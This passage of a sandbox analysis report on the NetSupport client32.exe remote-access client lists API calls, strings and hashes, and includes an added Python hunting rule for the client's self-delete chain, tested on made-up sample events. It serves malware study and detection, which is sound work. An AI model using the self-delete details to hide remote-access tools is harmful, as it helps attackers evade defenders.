                                                                                • _memmove.LIBCMT ref: 11127724
                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                • API String ID: 2219718054-800295887
                                                                                • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
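The routine at 11127400 above is the client's self-delete path: it resolves %TEMP% (GetTempPathA), writes a 0x4D0-byte helper (CreateFileA/WriteFile; the string table names it NSelfDel.exe), launches it with the wsprintfA format `"%s" %d %s`, and then launches explorer.exe. That sequence is visible in ordinary process-creation telemetry, so here is a hunting rule for it, added as an example and not code from the Joe Sandbox report or from NetSupport. The Sysmon-style record schema and every event in SAMPLE_EVENTS are constructed for the demo; the report shows only the format string, so treating the `%d` as the launching process's PID and the trailing `%s` as a path is an assumption of mine.

```python
"""Hunt for the NetSupport self-delete chain in process-creation telemetry.

Added example (not from the Joe Sandbox report or NetSupport). Encodes the API
sequence the report lists for the routine at 11127400: GetTempPathA ->
CreateFileA/WriteFile of a 0x4D0-byte stub -> CreateProcessA with "%s" %d %s ->
CreateProcessA "explorer.exe". Event schema and sample events are constructed.
"""
import ntpath
import re

STUB_NAME = "nselfdel.exe"   # helper name from the report's String ID list

# "<quoted path>" <decimal pid> <rest>  -- the wsprintfA format "%s" %d %s.
# Assumption: %d is the PID of the spawning client and the rest is a path.
STUB_CMDLINE = re.compile(r'^"(?P<path>[^"]+)"\s+(?P<pid>\d+)\s+(?P<rest>\S.*)$')


def _under_temp(image: str) -> bool:
    """GetTempPathA returns %TEMP%; on a stock install that path contains \\Temp\\."""
    low = image.lower()
    return "\\temp\\" in low or "\\tmp\\" in low


def find_selfdelete_chains(events):
    """Return one finding per NSelfDel.exe launch that fits the report's sequence.

    events: iterable of dicts with pid, ppid, image, parent_image, cmdline
    (the fields a Sysmon EID 1 / Security 4688 record carries).
    """
    children = {}
    for ev in events:
        children.setdefault(ev["ppid"], []).append(ev)

    findings = []
    for ev in events:
        if ntpath.basename(ev["image"]).lower() != STUB_NAME:
            continue
        if not _under_temp(ev["image"]):
            continue                       # stub is always dropped under %TEMP%
        m = STUB_CMDLINE.match(ev["cmdline"])
        if m is None or int(m.group("pid")) != ev["ppid"]:
            continue                       # args do not point back at the spawner
        siblings = [c for c in children.get(ev["ppid"], []) if c is not ev]
        # The same routine also calls CreateProcessA("explorer.exe") from the parent.
        explorer = any(ntpath.basename(c["image"]).lower() == "explorer.exe"
                       for c in siblings)
        findings.append({
            "stub_pid": ev["pid"],
            "parent_pid": ev["ppid"],
            "parent_image": ev["parent_image"],
            "explorer_relaunch": explorer,
            "confidence": "high" if explorer else "medium",
        })
    return findings


# Constructed sample telemetry: one real chain, one decoy, one unrelated process.
SAMPLE_EVENTS = [
    {"pid": 4412, "ppid": 3280,
     "image": r"C:\Users\user\AppData\Roaming\upd\client32.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\upd\client32.exe"'},
    {"pid": 5020, "ppid": 4412,
     "image": r"C:\Users\user\AppData\Local\Temp\NSelfDel.exe",
     "parent_image": r"C:\Users\user\AppData\Roaming\upd\client32.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\NSelfDel.exe" 4412 C:\Users\user\AppData\Roaming\upd'},
    {"pid": 5032, "ppid": 4412, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Users\user\AppData\Roaming\upd\client32.exe",
     "cmdline": "explorer.exe"},
    # Decoy: right file name, wrong location, PID argument is not its parent.
    {"pid": 6100, "ppid": 900, "image": r"C:\Tools\NSelfDel.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Tools\NSelfDel.exe" 4412 x'},
    {"pid": 6200, "ppid": 3280, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in find_selfdelete_chains(SAMPLE_EVENTS):
        print(hit)
```

The PID cross-check is what keeps the rule from firing on any file that happens to be called NSelfDel.exe: the stub needs its parent's PID to wait for the client to exit before unlinking it, so a launch whose argument does not equal the parent PID is not this routine. Treat the explorer.exe sibling as a confidence boost rather than a requirement, since the report shows it as a separate CreateProcessA call that could fail independently.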
                                                                                APIs
                                                                                • Sleep.KERNEL32(000007D0,?,?,?,?,00000003), ref: 1102DAA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: *.*$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$HookDirectSound$Stop tracing, almost terminated$Unload Hook$pSlash
                                                                                • API String ID: 3472027048-4043340749
                                                                                • Opcode ID: abf5e97b96bc686d2a41011667bb67a811128fec0cddda19ba6729b313092461
                                                                                • Instruction ID: d56efc98ad72941ff424cdc5152fef311379b6c09b9f264f80b34d0be5964fb8
                                                                                • Opcode Fuzzy Hash: abf5e97b96bc686d2a41011667bb67a811128fec0cddda19ba6729b313092461
                                                                                • Instruction Fuzzy Hash: 3EA1F274E426269FEB06DFE0CCC4F6DB7A5AB8470CF6001B8E62657288D7716D84CB52
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                • GetTickCount.KERNEL32 ref: 111472A0
                                                                                • GetTickCount.KERNEL32 ref: 111472C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                • API String ID: 132346978-2450594007
                                                                                • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 11123836
                                                                                • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                • IsIconic.USER32(?), ref: 111238C4
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                • API String ID: 2857465220-3401310001
                                                                                • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                APIs
                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                                • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                • IsIconic.USER32(00000001), ref: 110CB844
                                                                                • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                • API String ID: 2655531791-1552842965
                                                                                • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                                • GetLastError.KERNEL32 ref: 110F3820
                                                                                • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                                • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                                • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                                • pSD, xrefs: 110F37C5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                • API String ID: 3134831419-838605531
                                                                                • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                                • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F886
                                                                                • RemovePropA.USER32(?), ref: 1115F8A5
                                                                                • RemovePropA.USER32(?), ref: 1115F8B4
                                                                                • RemovePropA.USER32(?,00000000), ref: 1115F8C3
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115FC59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                • API String ID: 1777853711-3305400014
                                                                                • Opcode ID: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                • Instruction ID: 2a1ce18ce9ffe677ff7d10ad8131c1a7db68a641085b95e9de3494b6caebac20
                                                                                • Opcode Fuzzy Hash: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                • Instruction Fuzzy Hash: 39D18E7530411A9BD748CE69E894EBBB3EAEBC9310B10466EFD56C3781DA31AC1187B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                • API String ID: 0-293745777
                                                                                • Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                • Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                                • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                  • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                  • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                  • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                  • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                  • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                  • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                  • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
